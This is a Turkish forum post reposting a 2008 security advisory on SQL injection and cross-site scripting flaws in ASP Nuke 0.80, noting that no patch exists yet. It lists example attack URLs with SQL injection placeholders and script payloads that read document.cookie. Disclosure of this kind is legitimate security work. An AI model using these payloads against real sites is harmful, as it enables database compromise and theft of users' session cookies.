AnasayfaForum KingAramaKayıt OlGiriş yap

Paylaş | 
 

 ASP Nuke Giriş Onaylama Güvenlik Açıkları

Aşağa gitmek 
YazarMesaj
CalvinKlein
Administrator
Administrator
avatar

Erkek
Mesaj Sayısı : 1355
Yaş : 24
Nerden : Nişantaşı
Rep :
10 / 10010 / 100

Ruh Hali :
Takım :
Kayıt tarihi : 06/04/08

Kişi sayfası
Oyunlar: Need for Speed

MesajKonu: ASP Nuke Giriş Onaylama Güvenlik Açıkları   Perş. Haz. 05, 2008 3:13 am

Konu: ASPNuke
Etkisi: Uzaktan SQL komutları çalıştırma
Etkilenen sürüm: 0.80
ASP Nuke yazılımında SQL Injection ve XSS (cross-site scripting) açıkları tespit edildi. profile.asp ve select.asp script'leri kullanıcının girdiği HTML kodlarını düzgün olarak filtrelemiyor. Bu açık sayesinde uzaktaki bir kullanıcı SQL komutları çalıştırabiliyor ve cross-site scripting saldırısı gerçekleştirebiliyor.
ör:
http://[target]/module/support/task/comments.asp?taskid='SQL_INJECTION
http://[target] /module/support/task/detail.asp?taskid='SQL_INJECTION
http://[target]/module/article/article/article.asp?articleid='SQL_INJECTION
http://[target]/module/discuss/forum/profile.asp?topicid=1&thradid=346&username='%22%3E %3Cs cript%3Ealert(document·cookie)%3C/script%3E
http://[target]/module/support/language/select.asp?code='%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E


Çözüm:

Henüz bir yama yada yeni sürüm çıkmadı
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://forumking.all-up.com
 
ASP Nuke Giriş Onaylama Güvenlik Açıkları
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» İktidarın Girişimci Çocukları
» İstila Kapıları
» NİNA VE ÇALAR SAATİ
» sakinn ha sakinn 359 ile baslayan numarayi aramayinnnnn
» Delta-kapisi

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
Hayata Dair Herşey :: Bilgisayar & İnternet :: Güvenlik :: Güvenlik ve Güvenlik Açıkları-
Buraya geçin: